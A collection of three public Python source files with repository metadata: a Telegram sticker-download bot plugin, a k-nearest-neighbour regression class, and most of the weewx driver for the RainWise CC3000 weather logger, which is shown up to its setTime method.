1f973cbc76659678d2b81c007e9a29458338f41e | d6670f0b4a039cb95216d59918c71a185e18f492 | /plugins/download_stickers.py | b72422017bd735fb60c6830c677004dbc6305e21 | [] | no_license | dlance87/lance7bot | 7dcf10fd8f3d15e4d9d3678a5d23b169ef08e408 | dc7b5887f6e9a004cb397501d24d7398a5a1c6ef | refs/heads/master | 2021-05-17T01:19:23.169150 | 2020-03-27T14:32:56 | 2020-03-27T14:32:56 | 250,553,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,764 | py |
import logging
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
import os
import time
# the secret configuration specific things
if bool(os.environ.get("WEBHOOK", False)):
from sample_config import Config
else:
from config import Config
# the Strings used for this "thing"
from translation import Translation
import pyrogram
logging.getLogger("pyrogram").setLevel(logging.WARNING)
from helper_funcs.display_progress import progress_for_pyrogram
@pyrogram.Client.on_message(pyrogram.Filters.sticker)
async def DownloadStickersBot(bot, update):
    """Telegram handler: when a sticker message arrives, download it to a
    per-user .png file, then send it back to the chat twice — once as a
    document and once as a photo — and finally delete the local file.

    Parameters:
        bot: the pyrogram Client instance.
        update: the incoming pyrogram Message carrying the sticker.
    """
    logger.info(update.from_user)
    # NOTE(review): the user id appears twice in the file name; presumably
    # one occurrence was meant to be a message id — confirm intent.
    download_location = Config.DOWNLOAD_LOCATION + "/" + str(update.from_user.id) + "_DownloadStickersBot_" + str(update.from_user.id) + ".png"
    # Status message that the progress callback keeps editing.
    a = await bot.send_message(
        chat_id=update.chat.id,
        text=Translation.DOWNLOAD_START,
        reply_to_message_id=update.message_id
    )
    try:
        c_time = time.time()
        the_real_download_location = await bot.download_media(
            message=update,
            file_name=download_location,
            progress=progress_for_pyrogram,
            progress_args=(
                Translation.DOWNLOAD_START,
                a,
                c_time
            )
        )
    except (ValueError) as e:
        # Surface the download failure to the user and abort.
        await bot.edit_message_text(
            text=str(e),
            chat_id=update.chat.id,
            message_id=a.message_id
        )
        return False
    await bot.edit_message_text(
        text=Translation.SAVED_RECVD_DOC_FILE,
        chat_id=update.chat.id,
        message_id=a.message_id
    )
    # Upload the sticker back as a document (preserves the raw file).
    c_time = time.time()
    await bot.send_document(
        chat_id=update.chat.id,
        document=the_real_download_location,
        # thumb=thumb_image_path,
        # caption=description,
        # reply_markup=reply_markup,
        reply_to_message_id=a.message_id,
        progress=progress_for_pyrogram,
        progress_args=(
            Translation.UPLOAD_START,
            a,
            c_time
        )
    )
    # Upload it again as a photo so it renders inline in the chat.
    await bot.send_photo(
        chat_id=update.chat.id,
        photo=the_real_download_location,
        # thumb=thumb_image_path,
        # caption=description,
        # reply_markup=reply_markup,
        reply_to_message_id=a.message_id,
        progress=progress_for_pyrogram,
        progress_args=(
            Translation.UPLOAD_START,
            a,
            c_time
        )
    )
    # Clean up the local copy and report completion.
    os.remove(the_real_download_location)
    await bot.edit_message_text(
        text=Translation.AFTER_SUCCESSFUL_UPLOAD_MSG,
        chat_id=update.chat.id,
        message_id=a.message_id,
        disable_web_page_preview=True
    )
| [
"noreply@github.com"
] | noreply@github.com |
9645c10049da11712293d7d3e8fd4238034dfe51 | b0779d29c84bedc5e89fc491abb0dbc5513b2793 | /knnreg.py | 0cf0ff877386ee8703e145edee38cfcb9ebe1e96 | [] | no_license | kalyaicasia/KNN-Regression | f80f5b1727b81a6d55c15842e1e66dc1053e9864 | 8308fe5bfd8ae79bc1d35c391e5bbe6723e5fb8b | refs/heads/main | 2023-06-21T23:02:19.234475 | 2021-07-22T08:18:21 | 2021-07-22T08:18:21 | 388,041,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,706 | py | import numpy as np
class knnreg ():
    """k-nearest-neighbour regressor.

    Parameters
    ----------
    distfcn : str
        "euclidean" for Minkowski exponent q=2; any other value uses
        Manhattan distance (q=1).
    normfcn : str
        "on" to min-max normalize each attribute column during fit (and
        to scale queries the same way); "off" to use raw values.
    """
    def __init__(self, distfcn = "euclidean", normfcn = "on") :
        # Minkowski exponent: 2 -> Euclidean, 1 -> Manhattan.
        self.q = 2 if distfcn.lower() == "euclidean" else 1
        self.normfn = normfcn.lower()

    def colcheck(self, ma):
        """Wrap a flat list into a one-column matrix ([x] per row)."""
        try:
            len(ma[0])
        except TypeError:
            ma = [[x] for x in ma]
        return ma

    def rowcheck(self, ma):
        """Wrap a flat list into a one-row matrix."""
        try:
            len(ma[0])
        except TypeError:
            ma = [ma]
        return ma

    def normalize(self, da, atrc):
        """Min-max scale one attribute column, recording min/max/range for
        attribute index `atrc` so queries can later be scaled identically."""
        self.max[atrc] = max(da)
        self.min[atrc] = min(da)
        # Guard against a constant column: fall back to a denominator of 1
        # so every value maps to 0 instead of raising ZeroDivisionError.
        self.den[atrc] = (self.max[atrc] - self.min[atrc]) or 1
        lo, rng = self.min[atrc], self.den[atrc]
        return [(x - lo) / rng for x in da]

    def calcdist(self, nd, ed):
        """Minkowski distance between query point `nd` and sample `ed`.

        Coordinates are paired positionally with zip; the original used
        ed.index(x), which mis-paired samples containing duplicate values.
        """
        sigma = sum(abs(a - b) ** self.q for a, b in zip(nd, ed))
        return sigma ** (1 / self.q)

    def fit (self, dec, tar):
        """Store (and optionally normalize) the training data.

        dec: decision matrix, one row per sample.
        tar: target values (flat list or one-column matrix).
        """
        tar = self.colcheck(tar)
        self.tar = tar
        self.samples = len(tar)
        self.atr = len(dec)  # kept for parity with the original attribute
        if self.normfn == "on":
            # Transpose so the first index selects an attribute column.
            self.alt = np.array(dec)
            self.dec = self.alt.T.tolist()  # self.dec - index refers to attributes
            # Size the min/max/range tables by the true number of attribute
            # columns (the original sized them by sample count, which broke
            # whenever there were more attributes than samples).
            n_attr = len(self.dec)
            self.min = [0] * n_attr
            self.max = [0] * n_attr
            self.den = [0] * n_attr
            # enumerate avoids self.dec.index(col), which returned the wrong
            # column index whenever two attribute columns were identical.
            self.dec = [self.normalize(col, i) for i, col in enumerate(self.dec)]
            self.alt = np.array(self.dec).T.tolist()  # back to sample rows
        else:
            self.alt = dec
        print("Model Fitted")

    def predicteach(self, k, nd):
        """Predict the target for one query row `nd` as the mean target of
        its k nearest training samples."""
        if self.normfn == "on":
            # Scale the query with the training min/range; build a new list
            # so the caller's input is not mutated (the original wrote the
            # scaled values back into the caller's list in place).
            nd = [(v - self.min[i]) / self.den[i] for i, v in enumerate(nd)]
        dist = [self.calcdist(nd, row) for row in self.alt]
        # Sum the targets of the k closest rows.  Overwriting a visited
        # entry with the current max removes it from further min() searches.
        total = 0
        remaining = k
        while remaining > 0:
            loc = dist.index(min(dist))
            total = total + self.tar[loc][0]
            dist[loc] = max(dist)
            remaining -= 1
        return total / k

    def predict(self, k, nd):
        """Predict targets for one or more query rows.

        Returns a one-column matrix: one [prediction] per query row.
        """
        nd = self.rowcheck(nd)
        return [[self.predicteach(k, row)] for row in nd]

    def check(self, pv, nt):
        """Return (mean absolute percentage error, accuracy), both in
        percent, for predictions `pv` against true targets `nt`."""
        pv = self.colcheck(pv)
        nt = self.colcheck(nt)
        errs = [abs(p[0] - t[0]) / t[0] for p, t in zip(pv, nt)]
        error = (sum(errs) / len(pv)) * 100
        acc = 100 - error
        return error, acc
"noreply@github.com"
] | noreply@github.com |
280cab33335daf580bca95b971a5c093b1896c52 | 6a95112805b64322953429270a305d01fef3faea | /dist/weewx-4.10.0/bin/weewx/drivers/cc3000.py | 22f01d1c3bb42aab59083b7c30094abe338751ce | [
"GPL-1.0-or-later",
"GPL-3.0-only",
"Apache-2.0"
] | permissive | tomdotorg/docker-weewx | c6d59dc492a9e53f3bc898f7b9f593717092d72c | 7085654f455d39b06acc688738fde27e1f78ad1e | refs/heads/main | 2023-06-08T17:57:44.184399 | 2023-01-30T11:21:23 | 2023-01-30T11:21:23 | 54,113,384 | 21 | 16 | Apache-2.0 | 2022-10-19T23:46:26 | 2016-03-17T11:39:29 | Dockerfile | UTF-8 | Python | false | false | 64,470 | py | #!/usr/bin/env python
#
# Copyright 2014 Matthew Wall
# See the file LICENSE.txt for your rights.
"""Driver for CC3000 data logger
http://www.rainwise.com/products/attachments/6832/20110518125531.pdf
There are a few variants:
CC-3000_ - __
| |
| 41 = 418 MHz
| 42 = 433 MHz
| __ = 2.4 GHz (LR compatible)
R = serial (RS232, RS485)
_ = USB 2.0
The CC3000 communicates using FTDI USB serial bridge. The CC3000R has both
RS-232 and RS-485 serial ports, only one of which may be used at a time.
A long range (LR) version transmits up to 2 km using 2.4GHz.
The RS232 communicates using 115200 N-8-1
The instrument cluster contains a DIP switch controls with value 0-3 and a
default of 0. This setting prevents interference when there are multiple
weather stations within radio range.
The CC3000 includes a temperature sensor - that is the source of inTemp. The
manual indicates that the CC3000 should run for 3 or 4 hours before applying
any calibration to offset the heat generated by CC3000 electronics.
The CC3000 uses 4 AA batteries to maintain its clock. Use only rechargeable
NiMH batteries.
The logger contains 2MB of memory, with a capacity of 49834 records (over 11
months of data at a 10 minute logging interval). The exact capacity depends
on the sensors; the basic sensor record is 42 bytes.
The logger does not delete old records when it fills up; once the logger is
full, new data are lost. So the driver must periodically clear the logger
memory.
This driver does not support hardware record_generation. It does support
catchup on startup.
If you request many history records then interrupt the receive, the logger will
continue to send history records until it sends all that were requested. As a
result, any queries made while the logger is still sending will fail.
The rainwise rain bucket measures 0.01 inches per tip. The logger firmware
automatically converts the bucket tip count to the measure of rain in ENGLISH
or METRIC units.
The historical records (DOWNLOAD), as well as current readings (NOW) track
the amount of rain since midnight; i.e., DOWNLOAD records rain value resets to 0
at midnight and NOW records do the same.
The RAIN=? returns a rain counter that only resets with the RAIN=RESET command.
This counter isn't used by weewx. Also, RAIN=RESET doesn't just reset this
counter, it also resets the daily rain count.
Logger uses the following units:
ENGLISH METRIC
wind mph m/s
rain inch mm
pressure inHg mbar
temperature F C
The CC3000 has the habit of failing to execute about 1 in 6000
commands. That the bad news. The good news is that the
condition is easily detected and the driver can recover in about 1s.
The telltale sing of failure is the first read after sending
the command (to read the echo of the command) times out. As such,
the timeout is set to 1s. If the timeout is hit, the buffers
are flushed and the command is retried. Oh, and there is one
more pecurliar part to this. On the retry, the command is echoed
as an empty string. That empty string is expected on the retry
and execution continues.
weewx includes a logwatch script that makes it easy to see the above
behavior in action. In the snippet below, 3 NOW commands and one
IME=? were retried successfully. The Retry Info section shows
that all succeeded on the second try.
--------------------- weewx Begin ------------------------
average station clock skew: 0.0666250000000001
min: -0.53 max: 0.65 samples: 160
counts:
archive: records added 988
cc3000: NOW cmd echo timed out 3
cc3000: NOW echoed as empty string 3
cc3000: NOW successful retries 3
cc3000: TIME=? cmd echo timed out 1
cc3000: TIME=? echoed as empty string 1
cc3000: TIME=? successful retries 1
....
cc3000 Retry Info:
Dec 29 00:50:04 ella weewx[24145] INFO weewx.drivers.cc3000: TIME=?: Retry worked. Total tries: 2
Dec 29 04:46:21 ella weewx[24145] INFO weewx.drivers.cc3000: NOW: Retry worked. Total tries: 2
Dec 29 08:31:11 ella weewx[22295] INFO weewx.drivers.cc3000: NOW: Retry worked. Total tries: 2
Dec 29 08:50:51 ella weewx[22295] INFO weewx.drivers.cc3000: NOW: Retry worked. Total tries: 2
....
---------------------- weewx End -------------------------
Clearing memory on the CC3000 takes about 12s. As such, the 1s
timeout mentioned above won't work for this command. Consequently,
when executing MEM=CLEAR, the timeout is set to 20s. Should this
command fail, rather than losing 1 second retrying, 20 sexconds
will be lost.
The CC3000 very rarely stops returning observation values.
[Observed once in 28 months of operation over two devices.]
Operation returns to normal after the CC3000 is rebooted.
This driver now reboots when this situation is detected.
If this happens, the log will show:
INFO weewx.drivers.cc3000: No data from sensors, rebooting.
INFO weewx.drivers.cc3000: Back from a reboot:
INFO weewx.drivers.cc3000: ....................
INFO weewx.drivers.cc3000:
INFO weewx.drivers.cc3000: Rainwise CC-3000 Version: 1.3 Build 022 Dec 02 2016
INFO weewx.drivers.cc3000: Flash ID 202015
INFO weewx.drivers.cc3000: Initializing memory...OK.
This driver was tested with:
Rainwise CC-3000 Version: 1.3 Build 022 Dec 02 2016
Earlier versions of this driver were tested with:
Rainwise CC-3000 Version: 1.3 Build 006 Sep 04 2013
Rainwise CC-3000 Version: 1.3 Build 016 Aug 21 2014
"""
# FIXME: Come up with a way to deal with firmware inconsistencies. if we do
# a strict protocol where we wait for an OK response, but one version of
# the firmware responds whereas another version does not, this leads to
# comm problems. specializing the code to handle quirks of each
# firmware version is not desirable.
# UPDATE: As of 0.30, the driver does a flush of the serial buffer before
# doing any command. The problem detailed above (OK not being returned)
# was probably because the timeout was too short for the MEM=CLEAR
# command. That command gets a longer timeout in version 0.30.
# FIXME: Figure out why system log messages are lost. When reading from the logger
# there are many messages to the log that just do not show up, or msgs
# that appear in one run but not in a second, identical run. I suspect
# that system log cannot handle the load? or its buffer is not big enough?
# Update:
# With debug=0, this has never been observed in v1.3 Build 22 Dec 02 2016.
# With debug=1, tailing the log looks like everything is running, but no
# attempt was made to compuare log data between runs. Observations on
# NUC7i5 running Debian Buster.
from __future__ import with_statement
from __future__ import absolute_import
from __future__ import print_function
import datetime
import logging
import math
import serial
import string
import sys
import time
from six import byte2int
from six import PY2
from six.moves import input
import weeutil.weeutil
import weewx.drivers
import weewx.wxformulas
from weeutil.weeutil import to_int
from weewx.crc16 import crc16
log = logging.getLogger(__name__)
DRIVER_NAME = 'CC3000'
DRIVER_VERSION = '0.40'
def loader(config_dict, engine):
    """weewx factory entry point for this driver; `engine` is unused."""
    stn_config = config_dict[DRIVER_NAME]
    return CC3000Driver(**stn_config)
def configurator_loader(config_dict):
    # weewx factory entry point: return the configurator object.
    # config_dict is unused but required by the loader protocol.
    return CC3000Configurator()
def confeditor_loader():
    # weewx factory entry point: return the config-editor stanza helper.
    return CC3000ConfEditor()
DEBUG_SERIAL = 0
DEBUG_CHECKSUM = 0
DEBUG_OPENCLOSE = 0
class ChecksumError(weewx.WeeWxIOError):
    """Base class for checksum/CRC failures while reading the CC3000."""
    def __init__(self, msg):
        super(ChecksumError, self).__init__(msg)
class ChecksumMismatch(ChecksumError):
    """Raised when the computed checksum differs from the one received."""
    def __init__(self, a, b, buf=None):
        detail = "Checksum mismatch: 0x%04x != 0x%04x" % (a, b)
        if buf is not None:
            detail = "%s (%s)" % (detail, buf)
        ChecksumError.__init__(self, detail)
class BadCRC(ChecksumError):
    """Raised when the checksum field itself cannot be parsed as hex."""
    def __init__(self, a, b, buf=None):
        detail = "Bad CRC: 0x%04x != '%s'" % (a, b)
        if buf is not None:
            detail = "%s (%s)" % (detail, buf)
        ChecksumError.__init__(self, detail)
class CC3000Configurator(weewx.drivers.AbstractConfigurator):
    """Command-line configurator for the CC3000: adds the driver-specific
    wee_device options, dispatches each option to the station, and wraps
    every destructive action in a y/n confirmation prompt."""

    def add_options(self, parser):
        """Register CC3000-specific command-line options on `parser`."""
        super(CC3000Configurator, self).add_options(parser)
        parser.add_option("--info", dest="info", action="store_true",
                          help="display weather station configuration")
        parser.add_option("--current", dest="current", action="store_true",
                          help="display current weather readings")
        parser.add_option("--history", dest="nrecords", type=int, metavar="N",
                          help="display N records (0 for all records)")
        parser.add_option("--history-since", dest="nminutes", metavar="N",
                          type=int, help="display records since N minutes ago")
        parser.add_option("--clear-memory", dest="clear", action="store_true",
                          help="clear station memory")
        parser.add_option("--get-header", dest="gethead", action="store_true",
                          help="display data header")
        parser.add_option("--get-rain", dest="getrain", action="store_true",
                          help="get the rain counter")
        parser.add_option("--reset-rain", dest="resetrain", action="store_true",
                          help="reset the rain counter")
        parser.add_option("--get-max", dest="getmax", action="store_true",
                          help="get the max values observed")
        parser.add_option("--reset-max", dest="resetmax", action="store_true",
                          help="reset the max counters")
        parser.add_option("--get-min", dest="getmin", action="store_true",
                          help="get the min values observed")
        parser.add_option("--reset-min", dest="resetmin", action="store_true",
                          help="reset the min counters")
        parser.add_option("--get-clock", dest="getclock", action="store_true",
                          help="display station clock")
        parser.add_option("--set-clock", dest="setclock", action="store_true",
                          help="set station clock to computer time")
        parser.add_option("--get-interval", dest="getint", action="store_true",
                          help="display logger archive interval, in seconds")
        parser.add_option("--set-interval", dest="interval", metavar="N",
                          type=int,
                          help="set logging interval to N seconds")
        parser.add_option("--get-units", dest="getunits", action="store_true",
                          help="show units of logger")
        parser.add_option("--set-units", dest="units", metavar="UNITS",
                          help="set units to METRIC or ENGLISH")
        parser.add_option('--get-dst', dest='getdst', action='store_true',
                          help='display daylight savings settings')
        parser.add_option('--set-dst', dest='setdst',
                          metavar='mm/dd HH:MM,mm/dd HH:MM,[MM]M',
                          help='set daylight savings start, end, and amount')
        parser.add_option("--get-channel", dest="getch", action="store_true",
                          help="display the station channel")
        parser.add_option("--set-channel", dest="ch", metavar="CHANNEL",
                          type=int,
                          help="set the station channel")

    def do_options(self, options, parser, config_dict, prompt): # @UnusedVariable
        """Dispatch the parsed options to the station.  With no specific
        option, print a full station summary.  Closes the port when done."""
        self.driver = CC3000Driver(**config_dict[DRIVER_NAME])
        if options.current:
            print(self.driver.get_current())
        elif options.nrecords is not None:
            for r in self.driver.station.gen_records(options.nrecords):
                print(r)
        elif options.nminutes is not None:
            # Convert "N minutes ago" into an epoch timestamp.
            since_ts = time.mktime((datetime.datetime.now()-datetime.timedelta(
                minutes=options.nminutes)).timetuple())
            for r in self.driver.gen_records_since_ts(since_ts):
                print(r)
        elif options.clear:
            self.clear_memory(options.noprompt)
        elif options.gethead:
            print(self.driver.station.get_header())
        elif options.getrain:
            print(self.driver.station.get_rain())
        elif options.resetrain:
            self.reset_rain(options.noprompt)
        elif options.getmax:
            print(self.driver.station.get_max())
        elif options.resetmax:
            self.reset_max(options.noprompt)
        elif options.getmin:
            print(self.driver.station.get_min())
        elif options.resetmin:
            self.reset_min(options.noprompt)
        elif options.getclock:
            print(self.driver.station.get_time())
        elif options.setclock:
            self.set_clock(options.noprompt)
        elif options.getdst:
            print(self.driver.station.get_dst())
        elif options.setdst:
            self.set_dst(options.setdst, options.noprompt)
        elif options.getint:
            # Station stores the interval in minutes; report seconds.
            print(self.driver.station.get_interval() * 60)
        elif options.interval is not None:
            # NOTE(review): true division yields fractional minutes on
            # Python 3 when N is not a multiple of 60 — verify intent.
            self.set_interval(options.interval / 60, options.noprompt)
        elif options.getunits:
            print(self.driver.station.get_units())
        elif options.units is not None:
            self.set_units(options.units, options.noprompt)
        elif options.getch:
            print(self.driver.station.get_channel())
        elif options.ch is not None:
            self.set_channel(options.ch, options.noprompt)
        else:
            # Default action: dump a full configuration summary.
            print("Firmware:", self.driver.station.get_version())
            print("Time:", self.driver.station.get_time())
            print("DST:", self.driver.station.get_dst())
            print("Units:", self.driver.station.get_units())
            print("Memory:", self.driver.station.get_memory_status())
            print("Interval:", self.driver.station.get_interval() * 60)
            print("Channel:", self.driver.station.get_channel())
            print("Charger:", self.driver.station.get_charger())
            print("Baro:", self.driver.station.get_baro())
            print("Rain:", self.driver.station.get_rain())
            print("HEADER:", self.driver.station.get_header())
            print("MAX:", self.driver.station.get_max())
            print("MIN:", self.driver.station.get_min())
        self.driver.closePort()

    def clear_memory(self, noprompt):
        """Clear the logger memory after an optional confirmation prompt."""
        print(self.driver.station.get_memory_status())
        ans = weeutil.weeutil.y_or_n("Clear console memory (y/n)? ",
                                     noprompt)
        if ans == 'y':
            print('Clearing memory (takes approx. 12s)')
            self.driver.station.clear_memory()
            print(self.driver.station.get_memory_status())
        else:
            print("Clear memory cancelled.")

    def reset_rain(self, noprompt):
        """Reset the station's cumulative rain counter (with confirmation)."""
        print(self.driver.station.get_rain())
        ans = weeutil.weeutil.y_or_n("Reset rain counter (y/n)? ",
                                     noprompt)
        if ans == 'y':
            print('Resetting rain counter')
            self.driver.station.reset_rain()
            print(self.driver.station.get_rain())
        else:
            print("Reset rain cancelled.")

    def reset_max(self, noprompt):
        """Reset the station's max-value counters (with confirmation)."""
        print(self.driver.station.get_max())
        ans = weeutil.weeutil.y_or_n("Reset max counters (y/n)? ",
                                     noprompt)
        if ans == 'y':
            print('Resetting max counters')
            self.driver.station.reset_max()
            print(self.driver.station.get_max())
        else:
            print("Reset max cancelled.")

    def reset_min(self, noprompt):
        """Reset the station's min-value counters (with confirmation)."""
        print(self.driver.station.get_min())
        ans = weeutil.weeutil.y_or_n("Reset min counters (y/n)? ",
                                     noprompt)
        if ans == 'y':
            print('Resetting min counters')
            self.driver.station.reset_min()
            print(self.driver.station.get_min())
        else:
            print("Reset min cancelled.")

    def set_interval(self, interval, noprompt):
        """Set the archive interval, in minutes (0-60), with confirmation."""
        if interval < 0 or 60 < interval:
            raise ValueError("Logger interval must be 0-60 minutes")
        print("Interval is", self.driver.station.get_interval(), " minutes.")
        ans = weeutil.weeutil.y_or_n("Set interval to %d minutes (y/n)? " % interval,
                                     noprompt)
        if ans == 'y':
            print("Setting interval to %d minutes" % interval)
            self.driver.station.set_interval(interval)
            print("Interval is now", self.driver.station.get_interval())
        else:
            print("Set interval cancelled.")

    def set_clock(self, noprompt):
        """Set the station clock to the computer's time, with confirmation."""
        print("Station clock is", self.driver.station.get_time())
        print("Current time is", datetime.datetime.now())
        ans = weeutil.weeutil.y_or_n("Set station time to current time (y/n)? ",
                                     noprompt)
        if ans == 'y':
            print("Setting station clock to %s" % datetime.datetime.now())
            self.driver.station.set_time()
            print("Station clock is now", self.driver.station.get_time())
        else:
            print("Set clock cancelled.")

    def set_units(self, units, noprompt):
        """Set station units to METRIC or ENGLISH, with confirmation."""
        if units.lower() not in ['metric', 'english']:
            raise ValueError("Units must be METRIC or ENGLISH")
        print("Station units is", self.driver.station.get_units())
        ans = weeutil.weeutil.y_or_n("Set station units to %s (y/n)? " % units,
                                     noprompt)
        if ans == 'y':
            print("Setting station units to %s" % units)
            self.driver.station.set_units(units)
            print("Station units is now", self.driver.station.get_units())
        else:
            print("Set units cancelled.")

    def set_dst(self, dst, noprompt):
        """Set the station's DST rule: '0' disables it, otherwise a
        'start,end,amount' triple is expected.  Confirms before applying."""
        if dst != '0' and len(dst.split(',')) != 3:
            raise ValueError("DST must be 0 (disabled) or start, stop, amount "
                             "with the format mm/dd HH:MM, mm/dd HH:MM, [MM]M")
        print("Station DST is", self.driver.station.get_dst())
        ans = weeutil.weeutil.y_or_n("Set station DST to %s (y/n)? " % dst,
                                     noprompt)
        if ans == 'y':
            print("Setting station DST to %s" % dst)
            self.driver.station.set_dst(dst)
            print("Station DST is now", self.driver.station.get_dst())
        else:
            print("Set DST cancelled.")

    def set_channel(self, ch, noprompt):
        """Set the station radio channel (0-3), with confirmation."""
        if ch not in [0, 1, 2, 3]:
            raise ValueError("Channel must be one of 0, 1, 2, or 3")
        print("Station channel is", self.driver.station.get_channel())
        ans = weeutil.weeutil.y_or_n("Set station channel to %s (y/n)? " % ch,
                                     noprompt)
        if ans == 'y':
            print("Setting station channel to %s" % ch)
            self.driver.station.set_channel(ch)
            print("Station channel is now", self.driver.station.get_channel())
        else:
            print("Set channel cancelled.")
class CC3000Driver(weewx.drivers.AbstractDevice):
    """weewx driver that communicates with a RainWise CC3000 data logger."""

    # map rainwise names to database schema names
    DEFAULT_SENSOR_MAP = {
        'dateTime': 'TIMESTAMP',
        'outTemp': 'TEMP OUT',
        'outHumidity': 'HUMIDITY',
        'windDir': 'WIND DIRECTION',
        'windSpeed': 'WIND SPEED',
        'windGust': 'WIND GUST',
        'pressure': 'PRESSURE',
        'inTemp': 'TEMP IN',
        'extraTemp1': 'TEMP 1',
        'extraTemp2': 'TEMP 2',
        'day_rain_total': 'RAIN',
        'supplyVoltage': 'STATION BATTERY',
        'consBatteryVoltage': 'BATTERY BACKUP',
        'radiation': 'SOLAR RADIATION',
        'UV': 'UV INDEX',
    }

    def __init__(self, **stn_dict):
        """Open the serial port and query the station configuration.

        Recognized stn_dict keys: port, model, max_tries, polling_interval,
        use_station_time, sensor_map, logger_threshold, and the
        debug_serial/debug_checksum/debug_openclose flags.
        """
        log.info('Driver version is %s' % DRIVER_VERSION)
        global DEBUG_SERIAL
        DEBUG_SERIAL = int(stn_dict.get('debug_serial', 0))
        global DEBUG_CHECKSUM
        DEBUG_CHECKSUM = int(stn_dict.get('debug_checksum', 0))
        global DEBUG_OPENCLOSE
        DEBUG_OPENCLOSE = int(stn_dict.get('debug_openclose', 0))
        self.max_tries = int(stn_dict.get('max_tries', 5))
        self.model = stn_dict.get('model', 'CC3000')
        port = stn_dict.get('port', CC3000.DEFAULT_PORT)
        log.info('Using serial port %s' % port)
        self.polling_interval = float(stn_dict.get('polling_interval', 2))
        log.info('Polling interval is %s seconds' % self.polling_interval)
        self.use_station_time = weeutil.weeutil.to_bool(
            stn_dict.get('use_station_time', True))
        log.info('Using %s time for loop packets' %
                 ('station' if self.use_station_time else 'computer'))
        # start with the default sensormap, then augment with user-specified
        self.sensor_map = dict(self.DEFAULT_SENSOR_MAP)
        if 'sensor_map' in stn_dict:
            self.sensor_map.update(stn_dict['sensor_map'])
        log.info('Sensor map is %s' % self.sensor_map)
        # periodically check the logger memory, then clear it if necessary.
        # these track the last time a check was made, and how often to make
        # the checks.  threshold of 0 indicates do not clear logger.
        self.logger_threshold = to_int(
            stn_dict.get('logger_threshold', 0))
        self.last_mem_check = 0
        self.mem_interval = 7 * 24 * 3600
        if self.logger_threshold != 0:
            log.info('Clear logger at %s records' % self.logger_threshold)
        # track the last rain counter value so we can determine deltas
        self.last_rain = None
        self.station = CC3000(port)
        self.station.open()
        # report the station configuration
        settings = self._init_station_with_retries(self.station, self.max_tries)
        log.info('Firmware: %s' % settings['firmware'])
        self.arcint = settings['arcint']
        log.info('Archive interval: %s' % self.arcint)
        self.header = settings['header']
        log.info('Header: %s' % self.header)
        self.units = weewx.METRICWX if settings['units'] == 'METRIC' else weewx.US
        log.info('Units: %s' % settings['units'])
        log.info('Channel: %s' % settings['channel'])
        log.info('Charger status: %s' % settings['charger'])
        log.info('Memory: %s' % self.station.get_memory_status())

    def time_to_next_poll(self):
        """Return seconds until the next polling-interval boundary."""
        now = time.time()
        next_poll_event = int(now / self.polling_interval) * self.polling_interval + self.polling_interval
        log.debug('now: %f, polling_interval: %d, next_poll_event: %f' % (now, self.polling_interval, next_poll_event))
        secs_to_poll = next_poll_event - now
        log.debug('Next polling event in %f seconds' % secs_to_poll)
        return secs_to_poll

    def genLoopPackets(self):
        """Yield live observation packets, retrying on serial errors,
        rebooting the station (at most once) if sensors go silent, and
        periodically clearing logger memory past the configured threshold."""
        cmd_mode = True
        if self.polling_interval == 0:
            self.station.set_auto()
            cmd_mode = False

        reboot_attempted = False
        ntries = 0
        while ntries < self.max_tries:
            ntries += 1
            try:
                # Poll on polling_interval boundaries.
                if self.polling_interval != 0:
                    time.sleep(self.time_to_next_poll())
                values = self.station.get_current_data(cmd_mode)
                now = int(time.time())
                ntries = 0
                log.debug("Values: %s" % values)
                if values:
                    packet = self._parse_current(
                        values, self.header, self.sensor_map)
                    log.debug("Parsed: %s" % packet)
                    if packet and 'dateTime' in packet:
                        if not self.use_station_time:
                            packet['dateTime'] = int(time.time() + 0.5)
                        packet['usUnits'] = self.units
                        if 'day_rain_total' in packet:
                            packet['rain'] = self._rain_total_to_delta(
                                packet['day_rain_total'], self.last_rain)
                            self.last_rain = packet['day_rain_total']
                        else:
                            log.debug("No rain in packet: %s" % packet)
                        log.debug("Packet: %s" % packet)
                        yield packet
                else:
                    if not reboot_attempted:
                        # To be on the safe side, max of one reboot per execution.
                        reboot_attempted = True
                        log.info("No data from sensors, rebooting.")
                        startup_msgs = self.station.reboot()
                        log.info("Back from a reboot:")
                        for line in startup_msgs:
                            log.info(line)

                # periodically check memory, clear if necessary
                if time.time() - self.last_mem_check > self.mem_interval:
                    nrec = self.station.get_history_usage()
                    self.last_mem_check = time.time()
                    if nrec is None:
                        log.info("Memory check: Cannot determine memory usage")
                    else:
                        log.info("Logger is at %d records, "
                                 "logger clearing threshold is %d" %
                                 (nrec, self.logger_threshold))
                        if self.logger_threshold != 0 and nrec >= self.logger_threshold:
                            log.info("Clearing all records from logger")
                            self.station.clear_memory()
            except (serial.serialutil.SerialException, weewx.WeeWxIOError) as e:
                log.error("Failed attempt %d of %d to get data: %s" %
                          (ntries, self.max_tries, e))
        else:
            msg = "Max retries (%d) exceeded" % self.max_tries
            log.error(msg)
            raise weewx.RetriesExceeded(msg)

    def genStartupRecords(self, since_ts):
        """Return archive records from the data logger.  Download all records
        then return the subset since the indicated timestamp.

        Assumptions:
         - the units are consistent for the entire history.
         - the archive interval is constant for entire history.
         - the HDR for archive records is the same as current HDR
        """
        log.debug("GenStartupRecords: since_ts=%s" % since_ts)
        log.info('Downloading new records (if any).')
        last_rain = None
        new_records = 0
        for pkt in self.gen_records_since_ts(since_ts):
            log.debug("Packet: %s" % pkt)
            pkt['usUnits'] = self.units
            pkt['interval'] = self.arcint
            if 'day_rain_total' in pkt:
                pkt['rain'] = self._rain_total_to_delta(
                    pkt['day_rain_total'], last_rain)
                last_rain = pkt['day_rain_total']
            else:
                # BUGFIX: this formerly referenced an undefined name 'r',
                # raising NameError whenever a record had no rain field.
                log.debug("No rain in record: %s" % pkt)
            log.debug("Packet: %s" % pkt)
            new_records += 1
            yield pkt
        log.info('Downloaded %d new records.' % new_records)

    def gen_records_since_ts(self, since_ts):
        """Generate raw history records newer than since_ts."""
        return self.station.gen_records_since_ts(self.header, self.sensor_map, since_ts)

    @property
    def hardware_name(self):
        return self.model

    @property
    def archive_interval(self):
        return self.arcint

    def getTime(self):
        """Return the station clock as a unix timestamp, or 0 on failure."""
        try:
            v = self.station.get_time()
            return _to_ts(v)
        except ValueError as e:
            log.error("getTime failed: %s" % e)
        return 0

    def setTime(self):
        """Set the station clock to the computer's time."""
